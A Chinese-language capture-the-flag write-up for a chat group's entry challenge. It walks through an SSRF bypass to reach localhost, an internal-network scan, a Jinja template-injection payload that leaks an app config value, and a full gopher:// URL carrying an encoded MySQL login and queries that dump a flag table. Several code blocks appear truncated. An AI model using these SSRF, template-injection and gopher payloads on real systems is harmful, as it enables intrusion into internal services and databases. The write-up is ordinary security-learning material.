关于某CTF交流群的入群题
关于某CTF交流群的入群题Orz。
换新题了,可以发了。
Emmm直接上题。
1 |
|
构造/?url=http://@127.0.0.1.:80/flag.php可以绕过,提示string(15) "172.11.243.0/24",应该是要扫内网。
1 | #!/usr/bin/env python |
然后扫到了172.11.243.81:8080,访问得到如下代码。
1 | import flask |
根据提示。
1 | ?url=http://172.11.243.81:8080/yulige/{{get_flashed_messages.globals[%27current_app%27].config[%27HINT%27]}} |
然后得到提示。
1 | string(29) "mysql_user_is_yuligeeee123321" |
看来是需要使用Gopher协议对数据库进行操作。
1 | http://ctf473831530.yulige.top:12345/?url=gopher://localhost:80@172.11.243.218:3306/_%25b3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2579%2575%256c%2569%2567%2565%2565%2565%2565%2531%2532%2533%2533%2532%2531%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%256b%2503%255f%256f%2573%250a%256d%2561%2563%256f%2573%2531%2530%252e%2531%2534%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2535%2530%2536%2531%2534%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2535%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2521%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2540%2540%2576%2565%2572%2573%2569%256f%256e%255f%2563%256f%256d%256d%2565%256e%2574%2520%256c%2569%256d%2569%2574%2520%2531%2512%2500%2500%2500%2503%2553%2545%254c%2545%2543%2554%2520%2544%2541%2554%2541%2542%2541%2553%2545%2528%2529%250c%2500%2500%2500%2502%2566%256c%2561%2534%2534%2534%2531%2531%2531%2531%2567%250f%2500%2500%2500%2503%2573%2568%256f%2577%2520%2564%2561%2574%2561%2562%2561%2573%2565%2573%250c%2500%2500%2500%2503%2573%2568%256f%2577%2520%2574%2561%2562%256c%2565%2573%251d%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%252a%2520%2566%2572%256f%256d%2520%2546%2531%2531%2531%2531%256c%256c%256c%256c%2567%2567%2567%2567%2567%2501%2500%2500%2500%2501 |